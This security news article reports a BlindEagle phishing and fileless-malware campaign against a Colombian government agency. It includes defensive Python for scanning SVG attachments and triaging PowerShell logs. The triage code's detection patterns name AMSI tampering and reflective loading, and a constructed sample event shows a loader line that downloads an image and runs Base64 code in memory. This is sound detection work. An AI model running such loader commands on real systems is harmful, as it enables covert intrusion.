BlindEagle Hackers Attacking Government Agencies with Powershell Scripts

BlindEagle, a South American threat group, has launched a sophisticated campaign against Colombian government agencies, demonstrating an alarming evolution in attack techniques.

In early September 2025, the group targeted a government agency under the Ministry of Commerce, Industry and Tourism (MCIT) using coordinated phishing emails and multi-stage malware delivery.

This attack represents a significant escalation in the complexity and sophistication of BlindEagle’s operations, moving beyond basic malware deployment to a carefully orchestrated chain involving several malicious components.

The attack begins with a strategically crafted phishing email impersonating the Colombian judicial system.

The email uses legal terminology and official government formatting to create a sense of urgency, pressuring recipients to confirm receipt of what appears to be a labor lawsuit notification.

Remarkably, the phishing email was sent from a compromised account within the same organization, lending credibility to the message and bypassing conventional email security measures.

This internal compromise allowed the attackers to exploit trust relationships and avoid detection by security protocols that typically flag external threats.

Zscaler analysts identified the complete attack chain and determined that BlindEagle employed an unusually complex fileless methodology to evade detection systems.

The SVG attachment included in BlindEagle’s phishing email (Source – Zscaler)

The initial attachment is an SVG (Scalable Vector Graphics) image containing encoded HTML that directs users to a fraudulent web portal mimicking the legitimate Colombian judicial branch.

Once a user interacts with this portal, the attack chain unfolds through three JavaScript files and a PowerShell command, each stage progressively deobfuscating the next component through various encoding techniques, including Base64 and custom obfuscation algorithms.
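Mail gateways and sandboxes often treat SVG as a harmless image format, which is exactly why an SVG carrying encoded HTML gets through. The scanner below is an added example written for this article, not code from Zscaler or from the report it summarises. It walks the SVG tree for active content (`<script>`, `<foreignObject>`, `on*` event handlers, `javascript:` or `data:text/html` links) and separately decodes any long Base64 run to see whether it contains HTML. The two SVG samples embedded in the block are constructed for the test and are not the attachment from the campaign.

```python
import base64
import re
import xml.etree.ElementTree as ET

# Constructed test inputs (hypothetical; not samples from the Zscaler report).
# The "bad" SVG hides a Base64-encoded HTML blob inside a <script> element.
INNER_HTML = b"<html><body><a href='https://portal.example.invalid/'>Ver notificacion</a></body></html>"
SAMPLE_SVG = f"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" width="400" height="300">
  <rect width="400" height="300" fill="#ffffff"/>
  <script type="text/javascript">
    var p = "{base64.b64encode(INNER_HTML).decode()}";
  </script>
</svg>
"""
CLEAN_SVG = '<svg xmlns="http://www.w3.org/2000/svg"><circle cx="5" cy="5" r="4"/></svg>'

ACTIVE_ELEMENTS = {"script", "foreignObject"}
DANGEROUS_URI_PREFIXES = ("javascript:", "data:text/html")
HTML_MARKERS = (b"<html", b"<script", b"<iframe", b"<body", b"<form")
# A run of 40+ Base64 alphabet characters plus optional padding.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def _local(name: str) -> str:
    """Strip an XML namespace prefix like '{http://www.w3.org/2000/svg}'."""
    return name.split("}", 1)[1] if "}" in name else name


def scan_svg(svg_text: str) -> dict:
    """Return {'suspicious': bool, 'findings': [...]} for one SVG document."""
    findings = []
    root = ET.fromstring(svg_text)
    for el in root.iter():
        tag = _local(el.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"active element <{tag}>")
        for attr, value in el.attrib.items():
            aname = _local(attr)
            if aname.lower().startswith("on"):
                findings.append(f"event handler {aname} on <{tag}>")
            if aname == "href" and value.strip().lower().startswith(DANGEROUS_URI_PREFIXES):
                findings.append(f"dangerous href on <{tag}>: {value[:40]}")
    # Second pass over the raw text: decode Base64 runs and look for HTML.
    for match in B64_RUN.finditer(svg_text):
        try:
            blob = base64.b64decode(match.group(0), validate=True)
        except ValueError:
            continue
        if any(marker in blob.lower() for marker in HTML_MARKERS):
            findings.append(f"base64 blob ({len(blob)} bytes) decodes to HTML")
    return {"suspicious": bool(findings), "findings": findings}


if __name__ == "__main__":
    for label, doc in (("constructed bad svg", SAMPLE_SVG), ("clean svg", CLEAN_SVG)):
        print(label, scan_svg(doc))
```

The Base64 pass is deliberately independent of the XML walk: a payload can sit in a `<text>` node, an attribute or a CDATA section, and an attachment that fails to parse as XML at all is itself worth flagging rather than silently skipping.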

Infection mechanism

The infection mechanism demonstrates particular sophistication through the use of steganography and legitimate services for payload delivery.

JavaScript files in the attack chain use intricate deobfuscation routines where integer arrays are converted to executable code.

The PowerShell command downloads an image file from the Internet Archive, extracts a Base64-encoded malicious payload hidden within it, and loads the payload directly into memory using .NET reflection.

Fraudulent web portal presented to the user during BlindEagle’s attack (Source – Zscaler)

This in-memory execution prevents any malicious file from touching the disk, significantly complicating detection efforts for traditional file-based security solutions.

The PowerShell script executes Caminho, a downloader malware with Portuguese language artifacts in its code, which then retrieves DCRAT through Discord’s content delivery network.

DCRAT includes advanced evasion capabilities, notably patching Microsoft’s Antimalware Scan Interface (AMSI) to disable detection mechanisms.

Decoded BlindEagle PowerShell command (Source – Zscaler)

The malware establishes persistence through scheduled tasks and registry modifications, providing attackers sustained access to compromised systems.
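Because the loader never writes a file, the most useful telemetry is PowerShell script block logging (Event ID 4104), where the decoded command appears in clear text. The following triage script is an added example written for this article, not Zscaler's detection logic or anything from the campaign itself; it scores each script block against weighted indicators that map to the behaviours described above (image download from a hosting service, Base64 extraction, in-memory .NET loading, AMSI tampering, scheduled-task and Run-key persistence) and alerts only when enough of them co-occur. The four sample events are constructed, the Internet Archive item name is a placeholder, and the Base64 extraction step in the suspicious sample is elided on purpose.

```python
import re
from dataclasses import dataclass, field

# Weighted indicators. Individually most are benign admin activity; the
# combination seen in a stego loader (download + decode + reflective load)
# is what pushes the score over the threshold.
INDICATORS = [
    ("download_primitive", 2, re.compile(r"Net\.WebClient|DownloadData|DownloadString|Invoke-WebRequest|Start-BitsTransfer", re.I)),
    ("image_from_hosting", 2, re.compile(r"https?://\S*(?:archive\.org|cdn\.discordapp\.com)\S*", re.I)),
    ("image_extension_in_url", 1, re.compile(r"https?://\S+?\.(?:png|jpe?g|gif|bmp)\b", re.I)),
    ("base64_decode", 1, re.compile(r"FromBase64String", re.I)),
    ("reflective_load", 3, re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load", re.I)),
    ("entrypoint_invoke", 2, re.compile(r"EntryPoint\.Invoke|GetMethod\(\s*['\"]Invoke", re.I)),
    ("amsi_tamper", 3, re.compile(r"AmsiScanBuffer|AmsiUtils|amsiInitFailed", re.I)),
    ("persistence", 2, re.compile(r"schtasks(?:\.exe)?\s+/create|Register-ScheduledTask|CurrentVersion\\Run", re.I)),
    ("encoded_command", 1, re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
]
ALERT_THRESHOLD = 5


@dataclass
class Verdict:
    score: int
    hits: list = field(default_factory=list)
    alert: bool = False


def score_script_block(text: str) -> Verdict:
    """Score one 4104 ScriptBlockText value against the indicator table."""
    hits = [name for name, _w, rx in INDICATORS if rx.search(text)]
    score = sum(w for name, w, _rx in INDICATORS if name in hits)
    return Verdict(score=score, hits=hits, alert=score >= ALERT_THRESHOLD)


def triage(events: list) -> list:
    """Return only the events that cross the alert threshold, with their evidence."""
    alerts = []
    for ev in events:
        v = score_script_block(ev["ScriptBlockText"])
        if v.alert:
            alerts.append({"record_id": ev["RecordId"], "score": v.score, "hits": v.hits})
    return alerts


# Constructed sample events (hypothetical RecordIds and script text).
SAMPLE_EVENTS = [
    {"RecordId": 1001, "ScriptBlockText":
     "Get-Service | Where-Object Status -eq 'Running' | Export-Csv C:\\temp\\svc.csv"},
    {"RecordId": 1002, "ScriptBlockText":
     "$w=New-Object Net.WebClient;$img=$w.DownloadData('https://archive.org/download/PLACEHOLDER-ITEM/cover.png');"
     "<# extraction of the embedded Base64 text elided #>"
     "[System.Reflection.Assembly]::Load([Convert]::FromBase64String($b)).EntryPoint.Invoke($null,$null)"},
    {"RecordId": 1003, "ScriptBlockText":
     "Invoke-WebRequest -Uri 'https://www.example.invalid/report.png' -OutFile report.png"},
    {"RecordId": 1004, "ScriptBlockText":
     "schtasks /create /tn Updater /tr C:\\Users\\Public\\u.exe /sc minute /mo 5"},
]

if __name__ == "__main__":
    for a in triage(SAMPLE_EVENTS):
        print(a)
```

Event 1003 (a plain image download) and 1004 (a scheduled task on its own) stay below the threshold, which is the point of weighting: a single primitive is noise in most fleets, while download plus Base64 decode plus `Assembly::Load` in one block is rarely legitimate. In production the persistence indicators are better correlated against the same host's 4698 (task created) and registry-write events than scored inside the script text alone.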

This campaign showcases BlindEagle’s maturation as a threat actor, combining social engineering expertise with technical proficiency in obfuscation, steganography, and legitimate service abuse to conduct targeted attacks against government infrastructure with minimal detection risk.
